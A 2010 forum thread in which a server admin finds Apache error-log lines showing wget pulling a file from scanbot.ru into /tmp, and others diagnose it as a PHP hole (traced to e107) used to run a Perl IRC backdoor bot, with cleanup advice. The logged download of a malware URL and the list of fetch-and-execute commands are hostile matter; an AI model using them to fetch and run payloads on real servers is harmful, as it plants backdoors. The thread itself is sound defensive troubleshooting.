Strange text in /var/log/apache2/error.log

Discussion in 'Server Operation' started by itsnedkeren, Jun 16, 2010.

  1. itsnedkeren

    itsnedkeren New Member

    Can anyone please tell me what this is:

    Code:
    --2010-06-16 23:28:21--  http://scanbot.ru/bot.txt
    Resolving scanbot.ru... 85.159.63.185
    Connecting to scanbot.ru|85.159.63.185|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 28717 (28K) [text/plain]
    Saving to: `/tmp/phpRaCehS'
    
         0K .......... .......... ........                        100% 1.13M=0.02s
    
    2010-06-16 23:28:21 (1.13 MB/s) - `/tmp/phpRaCehS' saved [28717/28717]
    
    sh: curl: command not found
    Died at /tmp/.s line 20.
    sh: curl: command not found
    
    Just saw that in my error log :( using google revealed nothing really. I'm guessing some malware / exploiter, but how can I remove this please?

    Thanks in advance for any assistance.
     
  2. matty

    matty Member

    I'd be looking very closely for that file, any other hidden or script files in /tmp, and through your access logs for requests that include things like "wget", "curl", "perl", and such.

    Basically, script kiddies try to exploit vulnerabilities in php etc by causing a script (something like phpbb, geeklog, etc) on your server to run commands, such as downloading and running hack scripts from another site. They like to use /tmp as working space as it is often world read/writeable, which helps them get around file system permissions.
     
  3. itsnedkeren

    itsnedkeren New Member

    Thanks for your reply, I've tried looking for that file in /tmp/ but there is nothing in there :confused:
     
  4. matty

    matty Member

    Possibly the main script was downloaded to the home directory of the website that was exploited, and it may clean up after itself to cover it's tracks. Search the access logs of all your sites to find any url request that has those commands in it. That will help you narrow down how they got in, and most likely, which web scripts you need to upgrade or report to the developers as having an exploit. Might be time to have another look over your security also, even though this attempt seems to have failed.
     
  5. itsnedkeren

    itsnedkeren New Member

    Thanks again and exactly which commands am I searching for?
     
  6. matty

    matty Member

    To be honest, it's a bit of a guess. They would use commands that can cause a file to be downloaded (curl was in the log you posted, wget), and then perhaps be unpacked (tar,unzip,rar), and then executed (sh,perl,php). Just to give some examples. The time stamp of the log you posted might give you some help finding where to look in the logs, too.
     
  7. itsnedkeren

    itsnedkeren New Member

    I'm now running 100% CPU. Some Perl script using it all :(

    3747 www-data 20 0 34088 4580 1400 R 100 0.4 157:27.73 perl
     
  8. matty

    matty Member

    I may have been hasty in saying it looked like that attempt failed. I directed you to look for the source, but don't forget to remove the payload that was saved in /tmp/phpRaCehS. Really have a close look in /tmp at what's in there. That payload file was 1.13M in size. Anyway, that bot.txt looks to be an irc file sharing bot. Kaspersky identifies it as Backdoor.Perl.Shellbot.a.
     
  9. itsnedkeren

    itsnedkeren New Member

    There was an empty file there, but with another name. I have deleted that, but nothing else is there.
     
  10. matty

    matty Member

    If you haven't already killed that process, you might like to try and find more about it with ps -efww. That will show the command arguments, which will hopefully show what file perl is running.

    Then, definitely kill that process. It looks like that bot is more indepth than what I first thought (I don't read protuguese..). Then you can start to clean up.

    http://translate.google.com.au/tran...K&prev=/search?q=sk12pack&start=10&hl=en&sa=N
     
  11. itsnedkeren

    itsnedkeren New Member

    Thanks again.

    I have killed the process, and closed off some of my sites that are not needed. CPU usage have now dropped.

    I will try and clean up later.
     
  12. esezako

    esezako New Member

    i have exactly the same problem. Any idea-solution?
     
  13. itsnedkeren

    itsnedkeren New Member

    Do you run the e107 website system? I found out that this was the culprit on my system. Some security hole in PHP-code caused others to execute malicious perl-scripts on my server.
     
  14. esezako

    esezako New Member

    yes, one of my clients have a e107 website.
    Can you tell me the file with the security hole?
     
  15. itsnedkeren

    itsnedkeren New Member

    There is more info on www.e107.org, but afaik it was the "Contact.php" file that was the problem.

    Although my problem was not like that, but it still came in from e107 in some way.
     
  16. esezako

    esezako New Member

    Thank's.
    Confirm i have the same issue.
    Solved.
     

Share This Page